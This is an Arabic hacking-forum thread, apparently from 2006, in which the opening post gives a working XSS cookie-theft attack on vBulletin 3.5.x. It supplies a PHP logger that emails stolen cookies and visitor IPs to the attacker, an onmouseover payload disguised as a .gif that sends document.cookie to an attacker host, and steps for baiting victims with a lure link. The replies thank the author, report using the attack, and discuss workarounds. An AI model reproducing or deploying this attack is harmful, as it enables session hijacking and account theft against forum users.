المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : Xss Vbulletin 3.5.x ( test: 3.5.4 ) جديد ثغرات الفي بي


bLoOd MoOn
17-04-2006, 08:01
Xss Vbulletin 3.5.x ( test: 3.5.4 )
آخر ثغرات الفي بي o|37|
ملاحظة : كل ****** استبدلها بكلمة c o o k i e لكن بدون مسافات |120|
--------------------------------------------------------------------
( 1 )

--------------------------------------------------------------------

حط الكود في ملف نوتباد ونسميه على سبيل المثال اكسبلويت بس لازم الامتداد مثل ماهو: exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$****** = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>



--------------------------------------------------------------------
غير YOUR ADDRESS E-MAIL الموجودة في الكود اعلاه الأى ايميلك

--------------------------------------------------------------------


( 2 )

--------------------------------------------------------------------
الكود الي بالأسفل حطه بنوتباد واحفظه بأمتداد gif طبعا بعد تغيير http://YOUR ADDRESS WEB.com الى اسم الموقع الي رفعت عليه ملف exploit.php

image.gif <<<مثال
--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >


--------------------------------------------------------------------

( 3 )

--------------------------------------------------------------------

طريقة التطبيق
--------------------------------------------------------------------

1° سوي مشاركة جديدة ومن ضمن المشاركة حط الكود الي بالاسفل
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">اكتب شي مغري هنا</a> '
3° اضغط على ارسال المشاركة
4° أنتظر رزقك :d

--------------------------------------------------------------------

اتمنى الشرح يكون واضح
تمتعوا بالخدمة |37|
ملاحظة لجماعة الكوبي بيست لا تنقل الموضوع بدون ذكر الكاتب|26| لأن الكاتب ممكن يخنقك |40| لوووول لذلك خليك متعاون

le3uonk
17-04-2006, 08:32
مشكور على شرح الثغره

كيف طريقة تسكير الثغره في المنتدى اخي الكريم

؟

le3uonk
17-04-2006, 08:43
يطلع خطا بالملف في المثال الي وضعته exploit.php

Parse error: syntax error, unexpected '*', expecting T_VARIABLE or '$' in /usr/home/XXXX/public_html/letest/logo.php on line 24

؟؟؟

badperson
17-04-2006, 08:58
[color=#FF0000][B]ملاحظة لجماعة الكوبي بيست لا تنقل الموضوع بدون ذكر الكاتب|26| لأن الكاتب ممكن يخنقك |40| لوووول لذلك خليك متعاون
حلوة يا اخي
تحياتي
باد

-=Mizo=-
17-04-2006, 11:07
اخي انا كلما احط مشاركه واحط اللنك هكذا
<a href=" http://ْْXXX/Mizo.gif" target="_blank"> هنا</a> '
يطلعلي اللنك ملخبط يعني ما يقدرون يسوون عليه Mouseover

-=Mizo=-
17-04-2006, 11:10
<a href=" http://****/Mizo.gif" target="_blank"> هنا</a> '
شفت نفس المشكله حتى هنا يصير نفس الشي

אָ alsb0r אָ
18-04-2006, 12:37
مشكور العاشق على الثغره



وللمعلوميه الـ html لازم يكون on

:)

AvIrL@BoY@LoVeR
18-04-2006, 12:41
مثل ماقال الصبور

ودورلك ادمن حاط الhtml متاح :)

امممممممم

يعني انسى :)


تشااو

le3uonk
18-04-2006, 08:09
يعني لازم يكون html مفعل

ممممممممممم

فيه طريقة نقدر نكتشف هل الأدمن مفعل html أو لا

General C
18-04-2006, 10:00
بسم الله الرحمن الرحيم

شكراً لك يغالي على الثغره

و جاري التطبيق

مع تحياتي

General C

AvIrL@BoY@LoVeR
18-04-2006, 02:30
الhtml تقدر تشوفها باخر الصفحه بالمنتدى

مثلا وانت بالصفحه هذي انزل اخر شيء وعطها نظره خاطفة الى اليمين وراح

تشووف اذا كان ال html متاح اولا

تشااو

le3uonk
18-04-2006, 07:50
الhtml تقدر تشوفها باخر الصفحه بالمنتدى

مثلا وانت بالصفحه هذي انزل اخر شيء وعطها نظره خاطفة الى اليمين وراح

تشووف اذا كان ال html متاح اولا

تشااو
مشكور اخوي الله يعطيك العافية ماقصرت

لكن مافي طريقة نقدر نتحايل

انا خطرت لي فكرة وقولولي رايكم

لو نضع الكود الخبيث داخل صفحة خارجية خارج المنتدى ونربط الصورة مع رابط صفحة خارج المنتدى
هل من الممكن تنجح الطريقة ؟

spurn1
19-04-2006, 01:23
شكرا وجاري التطبيق ................




Thanks

EgyOct
19-04-2006, 12:26
شكراً أخي

لكنها قديمة شوية ... والآن من النادر جداً أن تجد منتدى يسمح بأكواد html

MAGELLAN
02-04-2008, 11:28
مشكور اخوي والاخ:spurn1 صآدق الكل مانع الخاصيه الا اذا كنت فاضي تجلس تخترق المنتديات الي مافيها الا عضوين الادمين والدعم الفني هـ ع